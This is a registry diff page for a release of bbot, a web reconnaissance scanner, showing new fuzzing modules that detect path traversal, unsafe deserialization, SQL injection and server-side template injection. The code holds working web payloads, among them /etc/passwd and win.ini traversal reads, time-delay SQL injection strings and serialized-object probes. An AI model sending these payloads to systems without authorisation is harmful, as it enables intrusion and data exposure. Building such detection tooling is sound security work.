bbot 2.4.2__py3-none-any.whl → 2.4.2.6590rc0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of bbot might be problematic; consult the registry's advisory page for more details.

Files changed (64)
  1. bbot/__init__.py +1 -1
  2. bbot/core/event/base.py +64 -4
  3. bbot/core/helpers/diff.py +10 -7
  4. bbot/core/helpers/helper.py +5 -1
  5. bbot/core/helpers/misc.py +48 -11
  6. bbot/core/helpers/regex.py +4 -0
  7. bbot/core/helpers/regexes.py +45 -8
  8. bbot/core/helpers/url.py +21 -5
  9. bbot/core/helpers/web/client.py +25 -5
  10. bbot/core/helpers/web/engine.py +9 -1
  11. bbot/core/helpers/web/envelopes.py +352 -0
  12. bbot/core/helpers/web/web.py +10 -2
  13. bbot/core/helpers/yara_helper.py +50 -0
  14. bbot/core/modules.py +23 -7
  15. bbot/defaults.yml +26 -1
  16. bbot/modules/base.py +4 -2
  17. bbot/modules/{deadly/dastardly.py → dastardly.py} +1 -1
  18. bbot/modules/{deadly/ffuf.py → ffuf.py} +1 -1
  19. bbot/modules/ffuf_shortnames.py +1 -1
  20. bbot/modules/httpx.py +14 -0
  21. bbot/modules/hunt.py +24 -6
  22. bbot/modules/internal/aggregate.py +1 -0
  23. bbot/modules/internal/excavate.py +356 -197
  24. bbot/modules/lightfuzz/lightfuzz.py +203 -0
  25. bbot/modules/lightfuzz/submodules/__init__.py +0 -0
  26. bbot/modules/lightfuzz/submodules/base.py +312 -0
  27. bbot/modules/lightfuzz/submodules/cmdi.py +106 -0
  28. bbot/modules/lightfuzz/submodules/crypto.py +474 -0
  29. bbot/modules/lightfuzz/submodules/nosqli.py +183 -0
  30. bbot/modules/lightfuzz/submodules/path.py +154 -0
  31. bbot/modules/lightfuzz/submodules/serial.py +179 -0
  32. bbot/modules/lightfuzz/submodules/sqli.py +187 -0
  33. bbot/modules/lightfuzz/submodules/ssti.py +39 -0
  34. bbot/modules/lightfuzz/submodules/xss.py +191 -0
  35. bbot/modules/{deadly/nuclei.py → nuclei.py} +1 -1
  36. bbot/modules/paramminer_headers.py +2 -0
  37. bbot/modules/reflected_parameters.py +80 -0
  38. bbot/modules/{deadly/vhost.py → vhost.py} +2 -2
  39. bbot/presets/web/lightfuzz-heavy.yml +16 -0
  40. bbot/presets/web/lightfuzz-light.yml +20 -0
  41. bbot/presets/web/lightfuzz-medium.yml +14 -0
  42. bbot/presets/web/lightfuzz-superheavy.yml +13 -0
  43. bbot/presets/web/lightfuzz-xss.yml +21 -0
  44. bbot/presets/web/paramminer.yml +8 -5
  45. bbot/scanner/preset/args.py +26 -0
  46. bbot/scanner/scanner.py +6 -0
  47. bbot/test/test_step_1/test__module__tests.py +1 -1
  48. bbot/test/test_step_1/test_helpers.py +7 -0
  49. bbot/test/test_step_1/test_presets.py +2 -2
  50. bbot/test/test_step_1/test_web.py +20 -0
  51. bbot/test/test_step_1/test_web_envelopes.py +343 -0
  52. bbot/test/test_step_2/module_tests/test_module_excavate.py +404 -29
  53. bbot/test/test_step_2/module_tests/test_module_httpx.py +29 -0
  54. bbot/test/test_step_2/module_tests/test_module_hunt.py +18 -1
  55. bbot/test/test_step_2/module_tests/test_module_lightfuzz.py +1947 -0
  56. bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py +4 -1
  57. bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py +46 -2
  58. bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py +226 -0
  59. bbot/wordlists/paramminer_parameters.txt +0 -8
  60. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/METADATA +2 -1
  61. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/RECORD +64 -42
  62. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/LICENSE +0 -0
  63. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/WHEEL +0 -0
  64. {bbot-2.4.2.dist-info → bbot-2.4.2.6590rc0.dist-info}/entry_points.txt +0 -0
@@ -0,0 +1,154 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+ from urllib.parse import quote
5
+
6
+
7
class path(BaseLightfuzz):
    """
    Detects path traversal and local file inclusion vulnerabilities

    Techniques:

    * Relative Path Traversal:
        - Tests various relative path traversal patterns (../, ./, .../, etc.)
        - Uses multiple encoding variations (URL encoding, double encoding)
        - Attempts various path validation bypass techniques

    * Absolute Path Traversal:
        - Tests absolute paths for Windows (c:\\windows\\win.ini)
        - Tests absolute paths for Unix (/etc/passwd)
        - Tests null byte injection for extension bypass (%00)

    Results are validated using multiple confirmations and WAF response filtering to eliminate false positives.
    """

    friendly_name = "Path Traversal"

    async def fuzz(self):
        """Run the relative and absolute path traversal checks for this event's parameter.

        Appends FINDING dicts to ``self.results``; returns ``None``.
        """
        cookies = self.event.data.get("assigned_cookies", {})
        # populate_empty=False: traversal tolerance only makes sense when there is a
        # real original value to mutate, so bail out if the parameter is empty.
        probe_value = self.incoming_probe_value(populate_empty=False)
        if not probe_value:
            self.debug(
                f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
            )
            return

        # Single dot traversal tolerance test
        # Each technique pairs a benign payload (extra "./", resolves back to the original
        # value) with a destructive one (extra "../", resolves somewhere else). If the
        # single-dot variant matches the baseline while the double-dot variant differs,
        # the server is performing filesystem-style path resolution on the value.
        path_techniques = {
            "single-dot traversal tolerance (no-encoding)": {
                "singledot_payload": f"./a/../{probe_value}",
                "doubledot_payload": f"../a/../{probe_value}",
            },
            "single-dot traversal tolerance (no-encoding, leading slash)": {
                "singledot_payload": f"/./a/../{probe_value}",
                "doubledot_payload": f"/../a/../{probe_value}",
            },
            "single-dot traversal tolerance (url-encoding)": {
                "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""),
                "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""),
            },
            "single-dot traversal tolerance (url-encoding, leading slash)": {
                "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""),
                "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""),
            },
            "single-dot traversal tolerance (non-recursive stripping)": {
                "singledot_payload": f"...//a/....//{probe_value}",
                "doubledot_payload": f"....//a/....//{probe_value}",
            },
            "single-dot traversal tolerance (non-recursive stripping, leading slash)": {
                "singledot_payload": f"/...//a/....//{probe_value}",
                "doubledot_payload": f"/....//a/....//{probe_value}",
            },
            "single-dot traversal tolerance (double url-encoding)": {
                "singledot_payload": f".%252fa%252f..%252f{probe_value}",
                "doubledot_payload": f"..%252fa%252f..%252f{probe_value}",
            },
            "single-dot traversal tolerance (double url-encoding, leading slash)": {
                "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}",
                "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}",
            },
        }

        # If the original value already looks like a unix-style file path, add a
        # technique that keeps the original directory prefix intact.
        compiled_regex = self.lightfuzz.helpers.re.compile(r"/(?:[\w-]+/)*[\w-]+\.\w+")
        linux_path_regex = await self.lightfuzz.helpers.re.match(compiled_regex, probe_value)
        if linux_path_regex is not None:
            original_path_only = "/".join(probe_value.split("/")[:-1])
            original_filename_only = probe_value.split("/")[-1]
            # Some servers validate the start of the path, so we construct our payload with the original path and filename
            path_techniques["single-dot traversal tolerance (start of path validation)"] = {
                "singledot_payload": f"{original_path_only}/./{original_filename_only}",
                "doubledot_payload": f"{original_path_only}/../{original_filename_only}",
            }

        for path_technique, payloads in path_techniques.items():
            iterations = 5  # one failed detection is tolerated, as long as its not the first run
            confirmations = 0
            while iterations > 0:
                try:
                    # NOTE(review): compare_baseline is not awaited here (consistent with the
                    # other lightfuzz submodules) — presumably it returns a comparator object
                    # synchronously; confirm against BaseLightfuzz.
                    http_compare = self.compare_baseline(
                        self.event.data["type"], probe_value, cookies, skip_urlencoding=True
                    )
                    singledot_probe = await self.compare_probe(
                        http_compare,
                        self.event.data["type"],
                        payloads["singledot_payload"],
                        cookies,
                        skip_urlencoding=True,
                    )
                    doubledot_probe = await self.compare_probe(
                        http_compare,
                        self.event.data["type"],
                        payloads["doubledot_payload"],
                        cookies,
                        skip_urlencoding=True,
                    )
                    # if singledot_probe[0] is true, the response is the same as the baseline. This indicates adding a single dot did not break the functionality
                    # next, if doubledot_probe[0] is false, the response is different from the baseline. This further indicates that a real path is being manipulated
                    # if doubledot_probe[3] is not None, the response is not empty.
                    # if doubledot_probe[1] is not ["header"], the response is not JUST a header change.
                    # "The requested URL was rejected" is a very common WAF error message which appears on 200 OK response, confusing detections
                    if (
                        singledot_probe[0] is True
                        and doubledot_probe[0] is False
                        and doubledot_probe[3] is not None
                        and doubledot_probe[1] != ["header"]
                        and "The requested URL was rejected" not in doubledot_probe[3].text
                    ):
                        confirmations += 1
                        self.verbose(f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations")
                        # report only after MORE than 3 confirmations (i.e. the 4th one)
                        # NOTE(review): the original comment said "3 confirmations" but the code
                        # requires 4 — confirm the intended threshold.
                        if confirmations > 3:
                            self.results.append(
                                {
                                    "type": "FINDING",
                                    "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]",
                                }
                            )
                            # no need to report both techniques if they both work
                            break
                except HttpCompareError as e:
                    # comparison failed (e.g. unstable baseline); burn an iteration and retry
                    iterations -= 1
                    self.debug(e)
                    continue

                iterations -= 1
                # a miss on any run after a string of zero confirmations ends this technique early
                if confirmations == 0:
                    break

        # Absolute path test, covering Windows and Linux
        # Maps payload -> substring expected in the response body when the file is disclosed.
        absolute_paths = {
            r"c:\\windows\\win.ini": "; for 16-bit app support",
            "/etc/passwd": "daemon:x:",
            "../../../../../etc/passwd%00.png": "daemon:x:",
        }

        for path, trigger in absolute_paths.items():
            r = await self.standard_probe(self.event.data["type"], cookies, path, skip_urlencoding=True)
            if r and trigger in r.text:
                self.results.append(
                    {
                        "type": "FINDING",
                        "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]",
                    }
                )
@@ -0,0 +1,179 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+
5
class serial(BaseLightfuzz):
    """Finds parameters where serialized objects might be being deserialized.
    It starts by performing a baseline with a specially-crafted non-serialized payload, separated by type (base64, hex, php raw).
    This is designed to coax out an error that's not related to the decoding process.

    After performing the baseline (Which by design may contain an error), we check for two possible deserialization cases:

    1) Replacing the payload with a serialized object changes the status code to 200 (minus some string signatures to help prevent false positives)

    2) If the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
    """

    friendly_name = "Unsafe Deserialization"

    # Class-level constants
    # Control payloads: decode correctly (valid hex / base64 / PHP-ish syntax) but are
    # NOT valid serialized objects, so a deserializer should reject them.
    CONTROL_PAYLOAD_HEX = "f56124208220432ec767646acd2e6c6bc9622a62c5656f2eeb616e2f"
    CONTROL_PAYLOAD_BASE64 = "4Wt5fYx5Y3rELn5myS5oa996Ji7IZ28uwGdha4x6YmuMfG992CA="
    CONTROL_PAYLOAD_PHP_RAW = "z:0:{}"

    # Minimal VALID serialized objects per platform, base64-encoded
    BASE64_SERIALIZATION_PAYLOADS = {
        "php_base64": "YTowOnt9",
        "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=",
        "java_base64_string_error": "rO0ABXQABHRlc3Q=",
        "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=",
        "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==",
        "ruby_base64": "BAh7BjoKbE1FAAVJsg==",
    }

    # Minimal valid serialized objects, hex-encoded
    HEX_SERIALIZATION_PAYLOADS = {
        "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000",
        "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374",
        "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b",
    }

    # Raw (unencoded) PHP serialized object
    PHP_RAW_SERIALIZATION_PAYLOADS = {
        "php_raw": "a:0:{}",
    }

    # Telltale error strings emitted by deserializers (matched case-insensitively
    # against response bodies in fuzz())
    SERIALIZATION_ERRORS = [
        "invalid user",
        "cannot cast java.lang.string",
        "dump format error",
        "java.io.optionaldataexception",
    ]

    # Generic error signatures used to rule out false-positive 200 responses
    GENERAL_ERRORS = [
        "Internal Error",
        "Internal Server Error",
        "The requested URL was rejected",
    ]

    def is_possibly_serialized(self, value: str) -> bool:
        """Return True if *value* could plausibly be a serialized object
        (base64, hex, or PHP-serialized syntax); False otherwise."""
        # Use the is_base64 method from BaseLightfuzz via self
        if self.is_base64(value):
            return True

        # Use the is_hex method from BaseLightfuzz via self
        if self.is_hex(value):
            return True

        # List of common PHP serialized data prefixes
        php_serialized_prefixes = [
            "a:",  # Array
            "O:",  # Object
            "s:",  # String
            "i:",  # Integer
            "d:",  # Double
            "b:",  # Boolean
            "N;",  # Null
        ]

        # Check if the value starts with any of the PHP serialized prefixes
        if any(value.startswith(prefix) for prefix in php_serialized_prefixes):
            return True
        return False

    async def fuzz(self):
        """Run the deserialization probes, appending FINDING dicts to ``self.results``."""
        cookies = self.event.data.get("assigned_cookies", {})
        control_payload_hex = self.CONTROL_PAYLOAD_HEX
        control_payload_base64 = self.CONTROL_PAYLOAD_BASE64
        control_payload_php_raw = self.CONTROL_PAYLOAD_PHP_RAW

        base64_serialization_payloads = self.BASE64_SERIALIZATION_PAYLOADS
        hex_serialization_payloads = self.HEX_SERIALIZATION_PAYLOADS
        php_raw_serialization_payloads = self.PHP_RAW_SERIALIZATION_PAYLOADS

        serialization_errors = self.SERIALIZATION_ERRORS
        general_errors = self.GENERAL_ERRORS

        # Only proceed when there is no original value, or the original value could
        # itself be a serialized object (otherwise deserialization is unlikely).
        probe_value = self.incoming_probe_value(populate_empty=False)
        if probe_value:
            if self.is_possibly_serialized(probe_value):
                self.debug(
                    f"Existing value is not ruled out for being a serialized object, proceeding [{self.event.data['type']}] [{self.event.data['name']}]"
                )
            else:
                self.debug(
                    f"The Serialization Submodule only operates when there is no original value, or when the original value could potentially be a serialized object, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
                )
                return

        # Establish one baseline per encoding family, each using a control payload that
        # decodes cleanly but cannot deserialize.
        # NOTE(review): compare_baseline is not awaited here (consistent with the other
        # lightfuzz submodules) — presumably it returns a comparator object synchronously.
        try:
            http_compare_hex = self.compare_baseline(self.event.data["type"], control_payload_hex, cookies)
            http_compare_base64 = self.compare_baseline(self.event.data["type"], control_payload_base64, cookies)
            http_compare_php_raw = self.compare_baseline(self.event.data["type"], control_payload_php_raw, cookies)
        except HttpCompareError as e:
            self.debug(f"HttpCompareError encountered: {e}")
            return

        # Proceed with payload probes
        for payload_set, payload_baseline in [
            (base64_serialization_payloads, http_compare_base64),
            (hex_serialization_payloads, http_compare_hex),
            (php_raw_serialization_payloads, http_compare_php_raw),
        ]:
            # NOTE(review): "type" shadows the builtin within this loop
            for type, payload in payload_set.items():
                try:
                    matches_baseline, diff_reasons, reflection, response = await self.compare_probe(
                        payload_baseline, self.event.data["type"], payload, cookies
                    )
                except HttpCompareError as e:
                    self.debug(f"HttpCompareError encountered: {e}")
                    continue

                # identical to the control baseline -> the valid object changed nothing
                if matches_baseline:
                    self.debug(f"Payload {type} matches baseline, skipping")
                    continue

                self.debug(f"Probe result for {type}: {response}")

                # status_code 0 means no usable response object
                status_code = getattr(response, "status_code", 0)
                if status_code == 0:
                    continue

                if diff_reasons == ["header"]:
                    self.debug(f"Only header diffs found for {type}, skipping")
                    continue

                if status_code not in (200, 500):
                    self.debug(f"Status code {status_code} not in (200, 500), skipping")
                    continue

                # if the status code changed to 200, and the response doesn't match our general error exclusions, we have a finding
                self.debug(f"Potential finding detected for {type}, needs confirmation")
                if (
                    status_code == 200
                    and "code" in diff_reasons
                    and not any(
                        error in response.text for error in general_errors
                    )  # ensure the 200 is not actually an error
                ):
                    self.results.append(
                        {
                            "type": "FINDING",
                            "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]",
                        }
                    )
                # if the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
                # but only if the response is a 500, or a 200 with a body diff
                elif status_code == 500 or (status_code == 200 and diff_reasons == ["body"]):
                    self.debug(f"500 status code or body match for {type}")
                    for serialization_error in serialization_errors:
                        # check for the error string, but also ensure the error string isn't just always present in the response
                        if (
                            serialization_error in response.text.lower()
                            and serialization_error not in payload_baseline.baseline.text.lower()
                        ):
                            self.debug(f"Error string '{serialization_error}' found in response for {type}")
                            self.results.append(
                                {
                                    "type": "FINDING",
                                    "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]",
                                }
                            )
                            break
@@ -0,0 +1,187 @@
1
+ from .base import BaseLightfuzz
2
+ from bbot.errors import HttpCompareError
3
+
4
+ import statistics
5
+
6
+
7
class sqli(BaseLightfuzz):
    """
    Detects SQL injection vulnerabilities.

    Techniques:

    * Error-based Detection:
        - Injects single quotes and observes error responses
        - Tests quote escape sequence variations
        - Matches against known SQL error patterns

    * Time-based Blind Detection:
        - Uses vendor-specific time delay payloads
        - Confirms delays with statistical analysis
        - Requires multiple confirmations to eliminate false positives
    """

    friendly_name = "SQL Injection"

    # Seconds of delay each time-based payload asks the database to sleep
    expected_delay = 5
    # These are common error strings that strongly indicate SQL injection
    sqli_error_strings = [
        "Unterminated string literal",
        "Failed to parse string literal",
        "error in your SQL syntax",
        "syntax error at or near",
        "Unknown column",
        "unterminated quoted string",
        "Unclosed quotation mark",
        "Incorrect syntax near",
        "SQL command not properly ended",
        "string not properly terminated",
    ]

    def evaluate_delay(self, mean_baseline, measured_delay):
        """
        Evaluates if a measured delay falls within an expected range, indicating potential SQL injection.

        Parameters:
        - mean_baseline (float): The average baseline delay measured from non-injected requests.
        - measured_delay (float): The delay measured from a potentially injected request.

        Returns:
        - bool: True if the measured delay is within the expected range or exactly twice the expected delay, otherwise False.

        The function checks if the measured delay is within a margin of the expected delay or twice the expected delay,
        accounting for cases where the injected statement might be executed twice.
        """
        margin = 1.5
        single_delay = mean_baseline + self.expected_delay
        # twice the delay occurs when the statement gets placed in the query twice (a common occurrence)
        double_delay = mean_baseline + (self.expected_delay * 2)
        return (
            single_delay - margin <= measured_delay <= single_delay + margin
            or double_delay - margin <= measured_delay <= double_delay + margin
        )

    async def fuzz(self):
        """Run error-based and time-based blind SQLi checks for this event's parameter.

        Appends FINDING dicts to ``self.results``; returns ``None``.
        """
        cookies = self.event.data.get("assigned_cookies", {})
        probe_value = self.incoming_probe_value(populate_empty=True)
        http_compare = self.compare_baseline(
            self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True
        )

        try:
            # send the value with a single quote, and then another with two single quotes
            single_quote = await self.compare_probe(
                http_compare,
                self.event.data["type"],
                f"{probe_value}'",
                cookies,
                additional_params_populate_empty=True,
            )
            double_single_quote = await self.compare_probe(
                http_compare,
                self.event.data["type"],
                f"{probe_value}''",
                cookies,
                additional_params_populate_empty=True,
            )
            # if the single quote probe response is different from the baseline
            # (guard on [3]: compare_probe may yield no response object, and .text would raise)
            if single_quote[0] is False and single_quote[3] is not None:
                # check for common SQL error strings in the response
                for sqli_error_string in self.sqli_error_strings:
                    if sqli_error_string.lower() in single_quote[3].text.lower():
                        self.results.append(
                            {
                                "type": "FINDING",
                                "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]",
                            }
                        )
                        break
            # if both probes were successful (and had a response)
            if single_quote[3] and double_single_quote[3]:
                # Ensure none of the status codes are "429"
                if (
                    single_quote[3].status_code != 429
                    and double_single_quote[3].status_code != 429
                    and http_compare.baseline.status_code != 429
                ):  # prevent false positives from rate limiting
                    # if the code changed in the single quote probe, and the code is NOT the same between that and the double single quote probe, SQL injection is indicated
                    if "code" in single_quote[1] and (
                        single_quote[3].status_code != double_single_quote[3].status_code
                    ):
                        self.results.append(
                            {
                                "type": "FINDING",
                                "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote, Code Change ({http_compare.baseline.status_code}->{single_quote[3].status_code}->{double_single_quote[3].status_code})]",
                            }
                        )
            else:
                self.debug("Failed to get responses for both single_quote and double_single_quote")
        except HttpCompareError as e:
            self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}")

        # These are common SQL injection payloads for inducing an intentional delay across several different SQL database types
        # BUGFIX: a missing trailing comma after the oracle payload previously caused
        # implicit string concatenation, merging the oracle and mssql payloads into one
        # malformed probe and silently dropping the mssql test.
        standard_probe_strings = [
            f"'||pg_sleep({self.expected_delay})--",  # postgres
            f"1' AND (SLEEP({self.expected_delay})) AND '",  # mysql
            f"' AND (SELECT FROM DBMS_LOCK.SLEEP({self.expected_delay})) AND '1'='1",  # oracle (not tested)
            f"; WAITFOR DELAY '00:00:{self.expected_delay}'--",  # mssql (not tested)
        ]

        baseline_1 = await self.standard_probe(
            self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
        )
        baseline_2 = await self.standard_probe(
            self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
        )

        # get a baseline from two different probes. We will average them to establish a mean baseline
        if baseline_1 and baseline_2:
            baseline_1_delay = baseline_1.elapsed.total_seconds()
            baseline_2_delay = baseline_2.elapsed.total_seconds()
            mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay])

            for p in standard_probe_strings:
                confirmations = 0
                for _ in range(3):
                    # send the probe 3 times, and check if the delay is within the detection threshold
                    r = await self.standard_probe(
                        self.event.data["type"],
                        cookies,
                        f"{probe_value}{p}",
                        additional_params_populate_empty=True,
                        timeout=20,
                    )
                    if not r:
                        self.debug("delay measure request failed")
                        break

                    d = r.elapsed.total_seconds()
                    self.debug(f"measured delay: {str(d)}")
                    if self.evaluate_delay(
                        mean_baseline, d
                    ):  # decide if the delay is within the detection threshold and constitutes a successful sleep execution
                        confirmations += 1
                        self.debug(
                            f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} "
                        )
                    else:
                        break

                if confirmations == 3:
                    self.results.append(
                        {
                            "type": "FINDING",
                            "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]",
                        }
                    )

        else:
            self.debug("Could not get baseline for time-delay tests")
@@ -0,0 +1,39 @@
1
+ from .base import BaseLightfuzz
2
+
3
+
4
class ssti(BaseLightfuzz):
    """
    Detects server-side template injection vulnerabilities.

    Techniques:

    * Arithmetic Evaluation:
        - Injects encoded and unencoded multiplication expressions to detect evaluation
    """

    friendly_name = "Server-side Template Injection"

    async def fuzz(self):
        """Send arithmetic SSTI probes; record a FINDING when the product appears in the response."""
        assigned_cookies = self.event.data.get("assigned_cookies", {})
        # Each payload attempts to coax the template engine into evaluating 1337*1337;
        # a successful evaluation surfaces the product (1787569) in the response body.
        probes = (
            "<%25%3d%201337*1337%20%25>",
            "<%= 1337*1337 %>",
            "${1337*1337}",
            "%24%7b1337*1337%7d",
            "1,787{{z}},569",
        )
        evaluation_markers = ("1787569", "1,787,569")
        for payload in probes:
            response = await self.standard_probe(
                self.event.data["type"], assigned_cookies, payload, allow_redirects=True, skip_urlencoding=True
            )
            if not response:
                continue
            # look for the expected multiplication result in the response
            if any(marker in response.text for marker in evaluation_markers):
                self.results.append(
                    {
                        "type": "FINDING",
                        "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{payload}]",
                    }
                )
                break